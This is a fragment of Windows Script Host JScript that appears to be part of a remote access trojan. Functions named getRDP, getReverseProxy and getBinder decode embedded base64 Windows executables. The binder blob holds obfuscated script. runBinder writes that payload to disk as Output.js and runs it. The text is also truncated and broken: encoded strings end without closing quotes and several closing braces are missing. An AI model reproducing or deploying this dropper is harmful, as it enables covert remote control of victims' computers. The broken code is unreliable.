var encoded = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEAF7t0lwAAAAAAAAAAOAAAgELAQsAAFIAAAAQAAAAAAAArnEAAAAgAAAAgAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADgAAAABAAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAFRxAABXAAAAAKAAAGgKAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAwAAAAAgAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAtFEAAAAgAAAAUgAAAAQAAAAAAAAAAAAAAAAAACAAAGAuc2RhdGEAAJsAAAAAgAAAAAIAAABWAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAABoCgAAAKAAAAAMAAAAWAAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAADAAAAAAgAAAGQAAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = encoded;
return spike.nodeTypedValue;
function getRDP(){
var encoded = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEANarAV0AAAAAAAAAAOAAAgELAQsAADQAAAAWAAAAAAAA3lIAAAAgAAAAYAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADAAAAABAAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAIRSAABXAAAAAIAAADgRAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAAAAYAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA5DIAAAAgAAAANAAAAAQAAAAAAAAAAAAAAAAAACAAAGAuc2RhdGEAAIkAAAAAYAAAAAIAAAA4AAAAAAAAAAAAAAAAAABAAADALnJzcmMAAAA4EQAAAIAAAAASAAAAOgAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAACgAAAAAgAAAEwAAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = encoded;
return spike.nodeTypedValue;
function getReverseProxy(){
var encoded = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEAA7fSl0AAAAAAAAAAOAAAgELAQsAADQAAAAQAAAAAAAArlIAAAAgAAAAYAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADAAAAABAAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAGBSAABLAAAAAIAAAKgKAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAAAAYAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAtDIAAAAgAAAANAAAAAQAAAAAAAAAAAAAAAAAACAAAGAuc2RhdGEAAKQAAAAAYAAAAAIAAAA4AAAAAAAAAAAAAAAAAABAAADALnJzcmMAAACoCgAAAIAAAAAMAAAAOgAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAACgAAAAAgAAAEYAAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = encoded;
return spike.nodeTypedValue;
function getBinder(){
var encoded = "QU5Oc096emVUcVlxamZHZW5tdmVlcmlQbm9qaW93Y2tYZyA9ICIiIA0KVGdUclYgPSAxNzE7DQp2YXIgV1ZScUtkZUdIZ0dCc0ZLSUhzVkJleE16cmpCTkphY2psa2J1cVNtWGhFT0tGcUZMT0RMbnhxclpKUnlhY1J3Z0RYUElkUVJwR3lUWmpCdUJlcHlHUHBsdnNDa1lUTHZRSCA9ICJoR2lheGh4bFdneldScEhYd3ZtU3FST2xVUGFndFZ2RERTQnVNYmhJQlZ0Sm1aYU1kQVhQSXlSUXN3RmhHUnJBa3dTem9OTFZPZVFWWUV6dXBORHR5ZnVGQmtCUFZBQmtkc1lxR2JZUG9CQmVodnNueExzdE95Q0ZDTnhETHdBT2NncmdnSm9OcG5Fd2VQWEZzTlNLSUlWZnBUb3RlVUVzQiI7DQpuQkJFTUhvV2VEYnVGYW1wciA9IDE0NDsNCnZhciBMeGVxR1VLTXFNVnVpVWlNdnJOV0JnR2VuZEV1a2pzQkRtSkhPTGhocXJWdVNidmlzaEpqWlRxZXJ6Q2NRUWJHVVRyd0theGtLZ2dKS0xMTGhWQkRhSWNqdmZRT0lFUlpQUGF6a3pZU2taWnNuZ1VmID0gIm9ydnVQWWdMckhBZktqY0ZQR3R2a0wiOw0KQU5Oc096emVUcVlxamZHZW5tdmVlcmlQbm9qaW93Y2tYZyA9IEFOTnNPenplVHFZcWpmR2VubXZlZXJpUG5vamlvd2NrWGcgKyAiVFZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFUQUVEQUVvQ
if(encoded != "[binder1]"){
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = encoded;
return spike.nodeTypedValue;
}else{
return null;
function runBinder(){
var strsaveto = installdir + "Output.js";
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
try{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(getBinder());
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}catch(err){
updatestatus("Access+Denied");
if(objfsodownload.fileExists(strsaveto)){
shellobj.run("\"" + strsaveto + "\"");